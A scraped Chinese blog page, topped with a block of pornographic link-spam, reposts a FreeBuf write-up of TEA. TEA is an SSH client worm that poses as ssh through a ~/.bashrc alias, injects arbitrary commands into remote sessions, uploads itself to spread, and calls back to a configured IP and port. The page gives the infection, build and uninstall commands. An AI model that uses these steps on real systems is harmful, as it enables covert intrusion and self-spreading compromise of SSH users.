日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

ssh客户端_一款基于TAS框架的SSH客户端蠕虫

發布時間:2023/12/9 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ssh客户端_一款基于TAS框架的SSH客户端蠕虫 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

TEA是一款基于TAS框架的SSH客戶端蠕蟲,從本質上說,它是一個仿冒的SSH客戶端,它能夠修改tty輸入/輸出來實現任意命令執行,或通過SSH連接來上傳自身以實現滲透感染。

為了實現該工具的正常功能,遠程主機需要滿足以下條件:

1、在登錄時顯示“Last login”信息;

2、dd和stty;

3、目標用戶使用Bash作為默認Shell;

4、可運行fakessh代碼;

5、~/.bashrc可寫入;

感染本地主機:

mkdir ~/.sshwormcp ssh ~/.sshwormalias ssh='~/.sshworm/ssh'

我們首次執行fakessh時,并不會顯示任何內容,工具會執行post-install.c中的代碼,并將字符串alias ssh=”~/.sshworm/ssh”寫入到~/.bashrc中:

$?ssh$?sshusage:?ssh?[-46AaCfGgKkMNnqsTtVvXxYy]?[-B?bind_interface][-b?bind_address]?[-c?cipher_spec]?[-D?[bind_address:]port][-E?log_file]?[-e?escape_char]?[-F?configfile]?[-I?pkcs11][-i?identity_file]?[-J?[user@]host[:port]]?[-L?address][-l?login_name]?[-m?mac_spec]?[-O?ctl_cmd]?[-o?option]?[-p?port][-Q?query_option]?[-R?address]?[-S?ctl_path]?[-W?host:port][-w local_tun[:remote_tun]] destination [command實現傳播和感染

我們只需要連接到目標SSH服務器,并且服務器滿足TEA運行條件的話,目標設備以及連接至目標設備的主機就可以成功被感染。

tty修改:

Fakessh執行之后,它將會等到字符串“Last login”來開啟I/O修改(output-hooks.c),當接收到“Last login”之后,它將會發送一些任意指令(inject-cmd.c),然后等待命令執行的結果(output-hooks.c)。如果遠程設備中不存在文件~/.sshworm/ssh的話,蠕蟲將會上傳自身(upload.c)。

卸載:

$?rm?-rf?~/.sshworm$?perl?-i?-pe?'s;alias?ssh="~/.sshworm/ssh";;g'?~/.bashrc$ unalias ssh

編譯

我建議大家使用musl-libc,或其他的libc,但我不建議大家使用glibc,因為使用glibc編譯的代碼會非常大。

獲取源碼:

$ git clone —recurse-submodules https://github.com/hc0d3r/tea

構建選項:

名稱介紹
IP遠程IPv4 連接
PORT遠程port 連接

樣例:

$ make CC=musl-gcc IP=my-ipv4 PORT=1234

服務器

這里我們制作了一個簡單的服務器來處理鏈接,當post-install.c的代碼被執行之后,服務器將會接收到鏈接。服務器機制非常簡單,當新鏈接建立成功之后,它將會執行一條新的命令并通過命令行傳遞鏈接文件描述符,這樣才能保證執行的程序能夠處理鏈接。

編譯:

$?cd?server$?makecc?-Wall?-Wextra?-O3?-c?net.c?-o?net.occ?-Wall?-Wextra?-O3?-c?replace.c?-o?replace.occ?-Wall?-Wextra?-O3?-c?term.c?-o?term.occ?-Wall?-Wextra?-O3?-c?main.c?-o?main.occ -Wall -Wextra -O3 -o server net.o replace.o term.o main.o工具演示

項目地址

TEA:【GitHub傳送門】(閱讀原文獲取)

* 參考來源:hc0d3r,FB小編Alpha_h4ck編譯,轉載請注明來自FreeBuf.COM

精彩推薦

總結

以上是生活随笔為你收集整理的ssh客户端_一款基于TAS框架的SSH客户端蠕虫的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。